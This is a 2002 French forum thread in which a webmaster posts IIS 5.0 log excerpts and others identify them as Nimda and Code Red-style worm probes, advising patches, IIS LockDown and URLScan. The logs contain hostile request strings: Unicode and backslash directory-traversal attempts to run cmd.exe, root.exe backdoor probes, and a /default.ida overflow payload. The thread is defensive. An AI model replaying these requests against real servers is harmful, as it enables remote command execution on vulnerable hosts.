Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1416 connectés 

  FORUM HardWare.fr
  Windows & Software
  Win NT/2K/XP

  Qui sait interpreter un log d'IIS 5.0 ?

 
 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Qui sait interpreter un log d'IIS 5.0 ?

n°876692
Webman
Posté le 26-09-2002 à 19:18:28  profilanswer
 

Salut,
 
Est-ce que qq un peu me dire a quoi correspond ce log ? car je comprend pas pkoi il y a des accés a mon serveur IIS alors que personne ne connait l'adresse :D Ce qui me pose problème c'est de savoir a quoi correspondent ces commandes :)
 

Code :
  1. 2002-09-26 10:14:31 212.194.250.xx - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
  2. 2002-09-26 10:14:39 212.194.250.xx - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
  3. 2002-09-26 10:14:47 212.194.250.xx - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
  4. 2002-09-26 10:14:54 212.194.250.xx - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
  5. 2002-09-26 10:15:01 212.194.250.xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
  6. 2002-09-26 10:15:09 212.194.250.xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
  7. 2002-09-26 10:15:18 212.194.250.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
  8. 2002-09-26 10:15:26 212.194.250.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
  9. 2002-09-26 10:15:34 212.194.250.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
  10. 2002-09-26 10:15:42 212.194.250.xx - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
  11. 2002-09-26 12:05:41 212.194.209.xxx - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
  12. 2002-09-26 12:05:47 212.194.209.xxx - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
  13. 2002-09-26 12:05:53 212.194.209.xxx - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
  14. 2002-09-26 12:06:00 212.194.209.xxx - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
  15. 2002-09-26 12:54:25 213.37.28.x - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
  16. 2002-09-26 12:54:27 213.37.28.x - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
  17. 2002-09-26 12:54:31 213.37.28.x - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
  18. 2002-09-26 12:54:33 213.37.28.x - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
  19. 2002-09-26 12:54:34 213.37.28.x - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
  20. 2002-09-26 12:54:38 213.37.28.x - 127.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
  21. 2002-09-26 12:54:48 213.37.28.x - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
  22. 2002-09-26 12:54:49 213.37.28.x - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
  23. 2002-09-26 12:54:51 213.37.28.x - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
  24. 2002-09-26 12:54:51 213.37.28.x - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
  25. 2002-09-26 12:54:56 213.37.28.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
  26. 2002-09-26 12:54:58 213.37.28.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
  27. 2002-09-26 12:54:59 213.37.28.x - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
  28. 2002-09-26 12:54:59 213.37.28.x - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
  29. 2002-09-26 12:55:01 213.37.28.x - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
  30. 2002-09-26 12:55:05 213.37.28.x - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -


 
edit: j'ai mis des "xxx" a la place de la fin des adresses IP au cas où :D


Message édité par Webman le 26-09-2002 à 19:20:17
mood
Publicité
Posté le 26-09-2002 à 19:18:28  profilanswer
 

n°876697
Guru
Posté le 26-09-2002 à 19:20:04  profilanswer
 

A première vue cela ressemble fortement à une tentative d'infection de type Nimda ou un quelconque ver issu de celui ci.

n°876699
Webman
Posté le 26-09-2002 à 19:20:39  profilanswer
 

Guru a écrit a écrit :

A première vue cela ressemble fortement à une tentative d'infection de type Nimda ou un quelconque ver issu de celui ci.




 
C'est trés rassurant tout ca :)

n°876700
Webman
Posté le 26-09-2002 à 19:20:54  profilanswer
 

De plus j'en ai des kilomètres comme cela :(
En tout cas merci de ta réponse rapide :jap::jap:


Message édité par Webman le 26-09-2002 à 19:22:03
n°876713
Guru
Posté le 26-09-2002 à 19:24:33  profilanswer
 

Si tu as pris les précautions nécessaires quant à la mise à jour et la configuration de ton serveur IIS, tu ne crains pas grand chose. Néanmoins cela constituant une nuisance certaine tu peux essayer de contacter les services abuse des différents providers... Pour trouver l'origine : http://www.ripe.net/perl/whois

n°876722
Webman
Posté le 26-09-2002 à 19:30:09  profilanswer
 

Guru a écrit a écrit :

Si tu as pris les précautions nécessaires quant à la mise à jour et la configuration de ton serveur IIS, tu ne crains pas grand chose. Néanmoins cela constituant une nuisance certaine tu peux essayer de contacter les services abuse des différents providers... Pour trouver l'origine : http://www.ripe.net/perl/whois




 
Ok ! normalement mon serveur IIS est patché comme il faut :) de plus sur les conseils de Requin j'ai dl un petit soft pour tester tout ca :) donc je verrai bien :)
Merci pour cette adresse j'irai voir de plus prés qui m'en veut :D

n°884964
Webman
Posté le 04-10-2002 à 13:49:14  profilanswer
 

Salut,
 
C'est de mieux en mieux.... car maintenant les attaques deviennent originales... pour preuve voici une ligne extrait d'un de mes fichiers logs... :crazy:
 

Code :
  1. 2002-10-04 01:12:35 202.98.40.xx - 127.0.0.1 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  2. NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -


 
Personnelement je connaissais pas :D


Message édité par Webman le 04-10-2002 à 13:49:42
n°884991
WESTWOOD
Posté le 04-10-2002 à 14:12:18  profilanswer
 

J'espère que tu as bien installé :
 
- IIS LockDown
- URLScan
 
WW

n°884995
Webman
Posté le 04-10-2002 à 14:14:20  profilanswer
 

WestWood a écrit a écrit :

J'espère que tu as bien installé :
 
- IIS LockDown
- URLScan
 
WW




 
Non je n'ai rien installé de tel... mais Hotfix Reporter 3.2 me dis que mon serveur est correctement patché... donc est-ce bien necessaire de rajouter des trucs ?

n°884999
WESTWOOD
Posté le 04-10-2002 à 14:17:16  profilanswer
 

Si tu veux mon avis : OUI !
 
- IISLockDown : sécurise un minimum IIS
- URLScan : évite les attaques avec des URLs mal formatés (buffer overflow)
 
Au moment de CodeRed, tous les sites Web, surlequels ces outils étaient installés, ont échappés aux attaques.
 
Mieux vaut prévenir que guérir.
 
WW

mood
Publicité
Posté le 04-10-2002 à 14:17:16  profilanswer
 

n°885003
Webman
Posté le 04-10-2002 à 14:20:08  profilanswer
 

Merci de ta réponse :jap:
Bon ben je vais aller faire un petit tour sur Microsoft.com pour faire mon petit download de soft... De toute facon ca fera pas de mal... :D

n°885017
Webman
Posté le 04-10-2002 à 14:25:50  profilanswer
 

Voila l'adresse si cela intéresse quelqu'un ;)
http://www.microsoft.com/Downloads [...] seID=33961


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Windows & Software
  Win NT/2K/XP

  Qui sait interpreter un log d'IIS 5.0 ?

 

Sujets relatifs
Qui sait où trouver Dragon naturally speaking?Routeur cisco 801, ki sait comment on configure cette bete la?
Soft pour exploiter les log d'IIS 5.0 ?Configuration de IIS 5.0... besoin d'aide
Test de serveur IIS, il y en a pour 2 secondes.Urgent : quelqu'un sait où je peux trouver un driver ...
Après avoir installé IIS sur 2K faut rebooter ou pas ?Pb d'IIS et serveur FTP
FTP crée sours Win 2000 Server ( IIS ) -=- HELPIIS probleme avec les logs
Plus de sujets relatifs à : Qui sait interpreter un log d'IIS 5.0 ?

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo
Page générée en 0.098 secondes

Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR